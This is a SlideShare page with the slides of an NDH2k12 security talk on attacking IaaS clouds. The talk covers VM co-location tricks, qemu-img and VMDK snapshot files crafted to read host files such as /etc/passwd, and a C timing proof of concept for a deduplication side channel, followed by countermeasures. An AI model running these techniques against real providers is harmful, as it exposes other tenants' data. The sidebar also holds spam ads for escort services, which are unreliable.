 
Backup management with Ceph Storage - Camilo Echevarne, Félix Barbeira
Backup management with Ceph Storage - Camilo Echevarne, Félix BarbeiraBackup management with Ceph Storage - Camilo Echevarne, Félix Barbeira
Backup management with Ceph Storage - Camilo Echevarne, Félix BarbeiraCeph Community
 
PGConf.ASIA 2019 Bali - Building PostgreSQL as a Service with Kubernetes - Ta...
PGConf.ASIA 2019 Bali - Building PostgreSQL as a Service with Kubernetes - Ta...PGConf.ASIA 2019 Bali - Building PostgreSQL as a Service with Kubernetes - Ta...
PGConf.ASIA 2019 Bali - Building PostgreSQL as a Service with Kubernetes - Ta...Equnix Business Solutions
 
A Backup Today Saves Tomorrow
A Backup Today Saves TomorrowA Backup Today Saves Tomorrow
A Backup Today Saves TomorrowAndrew Moore
 
Ceph in the GRNET cloud stack
Ceph in the GRNET cloud stackCeph in the GRNET cloud stack
Ceph in the GRNET cloud stackNikos Kormpakis
 
Inside the Atlassian OnDemand Private Cloud
Inside the Atlassian OnDemand Private CloudInside the Atlassian OnDemand Private Cloud
Inside the Atlassian OnDemand Private CloudAtlassian
 
Ambedded - how to build a true no single point of failure ceph cluster
Ambedded - how to build a true no single point of failure ceph cluster Ambedded - how to build a true no single point of failure ceph cluster
Ambedded - how to build a true no single point of failure ceph cluster inwin stack
 
Deployment Strategies (Mongo Austin)
Deployment Strategies (Mongo Austin)Deployment Strategies (Mongo Austin)
Deployment Strategies (Mongo Austin)MongoDB
 

Similaire à NDH2k12 Cloud Computing Security (20)

Building A Scalable Open Source Storage Solution
Building A Scalable Open Source Storage SolutionBuilding A Scalable Open Source Storage Solution
Building A Scalable Open Source Storage Solution
 
Tuning Linux for MongoDB
Tuning Linux for MongoDBTuning Linux for MongoDB
Tuning Linux for MongoDB
 
Gluster intro-tdose
Gluster intro-tdoseGluster intro-tdose
Gluster intro-tdose
 
Gluster intro-tdose
Gluster intro-tdoseGluster intro-tdose
Gluster intro-tdose
 
Building the Enterprise infrastructure with PostgreSQL as the basis for stori...
Building the Enterprise infrastructure with PostgreSQL as the basis for stori...Building the Enterprise infrastructure with PostgreSQL as the basis for stori...
Building the Enterprise infrastructure with PostgreSQL as the basis for stori...
 
Embedded Linux Basics
Embedded Linux BasicsEmbedded Linux Basics
Embedded Linux Basics
 
Why Managed Service Providers Should Embrace Container Technology
Why Managed Service Providers Should Embrace Container TechnologyWhy Managed Service Providers Should Embrace Container Technology
Why Managed Service Providers Should Embrace Container Technology
 
Big Data in Container; Hadoop Spark in Docker and Mesos
Big Data in Container; Hadoop Spark in Docker and MesosBig Data in Container; Hadoop Spark in Docker and Mesos
Big Data in Container; Hadoop Spark in Docker and Mesos
 
Cloud Computing - Basics
Cloud Computing - BasicsCloud Computing - Basics
Cloud Computing - Basics
 
Software defined storage
Software defined storageSoftware defined storage
Software defined storage
 
MesosCon EU 2017 - Criteo - Operating Mesos-based Infrastructures
MesosCon EU 2017 - Criteo - Operating Mesos-based InfrastructuresMesosCon EU 2017 - Criteo - Operating Mesos-based Infrastructures
MesosCon EU 2017 - Criteo - Operating Mesos-based Infrastructures
 
Rapid Home Provisioning
Rapid Home ProvisioningRapid Home Provisioning
Rapid Home Provisioning
 
Running Oracle EBS in the cloud (DOAG TECH17 edition)
Running Oracle EBS in the cloud (DOAG TECH17 edition)Running Oracle EBS in the cloud (DOAG TECH17 edition)
Running Oracle EBS in the cloud (DOAG TECH17 edition)
 
Backup management with Ceph Storage - Camilo Echevarne, Félix Barbeira
Backup management with Ceph Storage - Camilo Echevarne, Félix BarbeiraBackup management with Ceph Storage - Camilo Echevarne, Félix Barbeira
Backup management with Ceph Storage - Camilo Echevarne, Félix Barbeira
 
PGConf.ASIA 2019 Bali - Building PostgreSQL as a Service with Kubernetes - Ta...
PGConf.ASIA 2019 Bali - Building PostgreSQL as a Service with Kubernetes - Ta...PGConf.ASIA 2019 Bali - Building PostgreSQL as a Service with Kubernetes - Ta...
PGConf.ASIA 2019 Bali - Building PostgreSQL as a Service with Kubernetes - Ta...
 
A Backup Today Saves Tomorrow
A Backup Today Saves TomorrowA Backup Today Saves Tomorrow
A Backup Today Saves Tomorrow
 
Ceph in the GRNET cloud stack
Ceph in the GRNET cloud stackCeph in the GRNET cloud stack
Ceph in the GRNET cloud stack
 
Inside the Atlassian OnDemand Private Cloud
Inside the Atlassian OnDemand Private CloudInside the Atlassian OnDemand Private Cloud
Inside the Atlassian OnDemand Private Cloud
 
Ambedded - how to build a true no single point of failure ceph cluster
Ambedded - how to build a true no single point of failure ceph cluster Ambedded - how to build a true no single point of failure ceph cluster
Ambedded - how to build a true no single point of failure ceph cluster
 
Deployment Strategies (Mongo Austin)
Deployment Strategies (Mongo Austin)Deployment Strategies (Mongo Austin)
Deployment Strategies (Mongo Austin)
 

Dernier

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 

Dernier (20)

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 

NDH2k12 Cloud Computing Security

  • 1. Hacking Cloud Computing infrastructures for fun and for profit Matthieu BOUTHORS Wednesday, July 11, 12
  • 2. Plan • Introduction to cloud computing • Focus on IaaS • Targeting data snapshots • Targeting data dedup 2 Wednesday, July 11, 12
  • 3. * as a Service 3 Wednesday, July 11, 12
  • 4. Characteristics • Agility / Elasticity : Everything could be scaled up/down • APIs : Everything could be automatized for more agility • Reliability / Low maintenance : sharing provide access to state-of-the-art architectures at low costs • Simplicity : Everything is divided in simple pieces (needed by previous points) 4 Wednesday, July 11, 12
  • 5. Focus on IaaS • Orchestration from user to behind the OS : – Networking (Firewall rules, Elastic IPs, DNS, Load-Balancing, ... ) – Storage (RAW Volumes creation/deletion, Mounts, Snapshots, ...) – Hypervisor (VM lifecycle, sizing, RO access to COM Port, ...) • Sound likes something new and interesting 5 Wednesday, July 11, 12
  • 7. Cloud Solutions • Custom orchestration other Xen/ Qemu-KVM hypervisor : AWS/ Rackspace/... • Closed source all-in-one solutions : VMWare (vsphere + cloud director), MS (Hyper-V + System Center) • Open source all-in-one solutions : OpenStack, Eucalyptus 7 Wednesday, July 11, 12
  • 8. IaaS Hackers’ objectives • Almost unlimited network/compute/ storage resources for free • Access to IaaS customers’ sensitive piece of data • Access to IaaS customers’ VMs 8 Wednesday, July 11, 12
  • 9. IaaS attack vectors • From the Internet – easiest to perform – limited attack surface – hard to find cloud specific vectors • Cloud APIs – Webservices available from all the Internet – Most secured part – Complete access to each IaaS functionality 9 Wednesday, July 11, 12
  • 10. IaaS attack vectors • From a VM inside the cloud : – behind almost all conventional layers of defense – simple and RAW access to underneath resources – almost all tool / custom code could be used on the VM – restricted to public cloud 10 Wednesday, July 11, 12
  • 11. “10$ Hack” principles • Pretend to be a legitimate customer • Spend a minimum of money thanks to elastic billing • Abuse a maximum of functionality only accessible to customers • Very effective against all provider with shared infrastructures 11 Wednesday, July 11, 12
  • 12. Get close to the target • Thousands of physical hosts but you hope to be in the same as your target • Host is assignation is only algorithm tuned with different goals : – limit host under-utilization – provide constant performance among all the hosts – avoid capacity issues 12 Wednesday, July 11, 12
  • 13. Abuse Host assignation • VMWare DRS : • spawn a lot of VMs and generate huge charge inside these VMs • VMs will be migrated to hosts with low usage • Stop generating load on VMs (VMs won’t be migrated but their hosts will be able to accept new busy VMs again) • Start DoS on targeted VMs • Targeted VMs will probably be migrated on a host where you already have a VM 13 Wednesday, July 11, 12
  • 15. Commonly used technologies • High performance NAS/SAN • Custom file format for RAW disks storage : – VMDK : VMWare – QED : qemu – TODO Hyper-V • Sometimes custom FS (VMWare VMFS) 15 Wednesday, July 11, 12
  • 16. Snapshots • Users tends to create VM from only a few subset of images • Duplicating a RAW disk image on VM creation on each VM creation takes ages • Users need way to easily save RAW disk images • Snapshots solve these problems 16 Wednesday, July 11, 12
  • 17. Snapshot principles • “Current” disk is marked as read only • New disk is created with the “current” disk as snapshot ancestor • New writes are performed on new disk • Reads are performed on new disk only if block has been re-writed since snapshot 17 Wednesday, July 11, 12
  • 18. Exploiting snapshots • Control the value of the ancestor • Restore the snapshot • Read the content of the chosen ancestor 18 Wednesday, July 11, 12
  • 19. qemu-kvm • anyfile can be used as an ancestor with standard qemu-img binary : • 19 $ qemu-img create -f qcow2 -b /etc/passwd nasty.qed $ strings nasty.qed /etc/passwd $ qemu-img convert -O raw nasty.qed nasty.raw && head -n 3 nasty.raw # $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $ # root:*:0:0:Charlie &:/root:/usr/local/bin/bash Wednesday, July 11, 12
  • 20. VMWare VMDK • No sexy tool like qemu-img • Virtual disk is usually separated into several .vmdk files • *-flat.vmdk files containing the raw data • .vmdk containing useful informations including the references to *-flat.vmdk files 20 Wednesday, July 11, 12
  • 21. Normal .vmdk 21 # Disk DescriptorFile version=1 encoding="UTF-8" CID=b5892a19 parentCID=ffffffff isNativeSnapshot="no" createType="vmfs" # Extent description RW 33554432 VMFS "debian-test-flat.vmdk" # The Disk Data Base #DDB ddb.virtualHWVersion = "8" ddb.longContentID = "312b4792544af9a8c959d20eb5892a19" ddb.uuid = "60 00 C2 9b 32 5e f1 d0-54 b3 29 04 95 51 99 3c" ddb.geometry.cylinders = "2088" ddb.geometry.heads = "255" ddb.geometry.sectors = "63" ddb.adapterType = "lsilogic" Wednesday, July 11, 12
  • 22. Modifying the extends • Works with -flat.vmdk files from other disk images • Does not seems to work on local text files • Seems to work on local gz files 22 Wednesday, July 11, 12
  • 23. .vmdk modified #1 23 # Disk DescriptorFile version=1 encoding="UTF-8" CID=b5892a19 parentCID=ffffffff isNativeSnapshot="no" createType="vmfs" # Extent description RW 33554432 VMFS "debian-test-flat.vmdk" RW 0 VMFS "debian-test_1-flat.vmdk" # The Disk Data Base #DDB ddb.virtualHWVersion = "8" ddb.longContentID = "312b4792544af9a8c959d20eb5892a19" ddb.uuid = "60 00 C2 9b 32 5e f1 d0-54 b3 29 04 95 51 99 3c" ddb.geometry.cylinders = "2088" ddb.geometry.heads = "255" ddb.geometry.sectors = "63" ddb.adapterType = "lsilogic" Wednesday, July 11, 12
  • 24. .vmdk modified #2 24 # Disk DescriptorFile version=1 encoding="UTF-8" CID=b5892a19 parentCID=ffffffff isNativeSnapshot="no" createType="vmfs" # Extent description RW 33554432 VMFS "debian-test-flat.vmdk" RW 0 VMFS "/bootbank/state.tgz" # The Disk Data Base #DDB ddb.virtualHWVersion = "8" ddb.longContentID = "312b4792544af9a8c959d20eb5892a19" ddb.uuid = "60 00 C2 9b 32 5e f1 d0-54 b3 29 04 95 51 99 3c" ddb.geometry.cylinders = "2088" ddb.geometry.heads = "255" ddb.geometry.sectors = "63" ddb.adapterType = "lsilogic" Wednesday, July 11, 12
  • 25. Retrieving data • Extend is accessible at the end of the disk device • We only have to skip the begining of the disk to retrieve the needed piece of data • In our case : 25 dd if=/dev/sda of=leaked_img skip=33554432 bs=512 25+0 records in 25+0 records out 12800 bytes transferred in 0.020000 secs (640001 bytes/sec) Wednesday, July 11, 12
  • 26. Caveats • Hard to guess other VMs .vmdk filenames and paths • .gz are truncated to the closest multiple of 512 bytes 26 Wednesday, July 11, 12
  • 27. Real-World attack possibilities • Unlikely to be able to forge these “snapshots” from API • Should be really useful when user is able to upload his own images 27 Wednesday, July 11, 12
  • 28. Deduplication • Snapshot is not enough for optimizing storage usage • Filer (or file-systems like ZFS) provides deduplication of redundant blocks • Each time two redundant blocks are found, a block is replaced by a link • If a block is rewrited, the entire block need to be written 28 Wednesday, July 11, 12
  • 29. Identify deduplication • If only one byte is written, all the deduplicated block needs to be written • Sounds like a write penalty • We will conduct timed attacks in order to identify this penalty 29 Wednesday, July 11, 12
  • 30. Caveat #1 • Deduplication may be asynchronous • Attack needs to wait for the deduplication process to occurs • Since deduplication is only on the Filer, VM does not need to run waiting for deduplication, only volume need to remains during the wait 30 Wednesday, July 11, 12
  • 31. Caveat #2 • Deduplication is filer-centric • Some filers work on NFS export at file level => no attack possible • Blocks may be misaligned between the VM Filesystem and the actual Filer => unlikely to be seen since this means a severe performance issue, the cloud provider will work for us and avoid this case 31 Wednesday, July 11, 12
  • 32. Caveat #3 • OS / Filesytems Cache • Empty Linux cache before doing anything else • Use direct IO for writing 32 Wednesday, July 11, 12
  • 33. What exploitation looks like • Create files that may be deduplicated and random files on your own VM • Wait (maybe 24 hours if dedup is a daily cron job) • Flush Linux file caches • Write one byte per block on each bloc (usually 4KB) • Compare timing on random files vs deduplicated files 33 Wednesday, July 11, 12
  • 34. Flush Linux file cache • Cache behaviour of Linux unpredictable • we need a tool to show and flush Linux file cache • VMTouch is this tools (thx to hoytech) • https://github.com/hoytech/vmtouch 34 Wednesday, July 11, 12
  • 35. Writes and time measurement • Avoiding python/ruby/java/... • Needs to use direct IOs • Needs to be far more precise than UNIX time command (ms precision) • Solution : simple C program 35 Wednesday, July 11, 12
  • 36. .c POC 36 #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <time.h> #include <stdio.h> int64_t timespecDiff(struct timespec *timeA_p, struct timespec *timeB_p) { return ((timeA_p->tv_sec * 1000000000) + timeA_p->tv_nsec) - ((timeB_p->tv_sec * 1000000000) + timeB_p- >tv_nsec); } int main(int argc, char **argv) { int f; int t = "A"; f = open(argv[1], O_WRONLY | O_DIRECT); struct timespec start, end; clock_gettime(CLOCK_MONOTONIC, &start); write(f,&t,1); clock_gettime(CLOCK_MONOTONIC, &end); printf("%dn",timespecDiff(&end, &start)); close(f); return 0; } Wednesday, July 11, 12
  • 38. Limitations of this POC • Only focus on first block of a file • Lack of automation • Lack of block size guessing (needed in order to correct first limitation) 38 Wednesday, July 11, 12
  • 39. Impacts / Counter-measure • Could be use to find if your cloud neighborhood have : • unpatched binaries on their VMs • files that belongs to you (dataleak detection) • Not limited to VMs, Provider may also have hypervisor’s data on the filer • Counter-measure : encrypt all your stuff in order to have different RAW blocks for same piece of data 39 Wednesday, July 11, 12
  • 40. Corrupting dedup • Work In Progress : – generating a collision on dedup table – when user try to write legitimate file, they are deduped to your backdoored version • Difficulties : – Each Filer / Filesystem have is own checksum algorithm : you need to gather information about the storage infrastructure – Filer / Filesystems using weak checksum usually perform bit per bit comparaison before dedup (for instance NetApp) – Finding usable collision on strong checksum algorithm is really hard (for instance ZFS uses AES-256) 40 Wednesday, July 11, 12
  • 41. Denial of Service via Dedup • Not tested yet • Only usable with solutions with weak checksum + bit-per-bit comparison • Attack scenario : – generate a maximum of collisions thanks to the weak algorithm 41 Wednesday, July 11, 12
  • 42. Solutions : Provider side • Innovative solutions need to be security assessed more than usual • Internal security actions need to be publicly known and mesurable • Solutions : – internal skilled security teams – certifications and external audit policies 42 Wednesday, July 11, 12
  • 43. Solutions : Customer/User side • Customer could not blindly trust any cloud provider • Counter-measures are available on customer side : – Avoid storing sensitive data unencrypted – Add firewall / IDS / IPS directly on VMs – Ensure the quality and reliability of the selected provider 43 Wednesday, July 11, 12
  • 44. Conclusions • New technologies bring new threats • Other attacks available : • VM memory overlapping Host Memory (VMSA-2012-0009.2) • Xen SYSRET instruction (CVE-2012-0217) • ... • New threats does not always mean new way to fight these threats 44 Wednesday, July 11, 12
  • 45. Questions ? • Thanks : @hackerzvoice & @outscale • Contacts : @majin_boo 45 CrashFR will never die in our living memories Wednesday, July 11, 12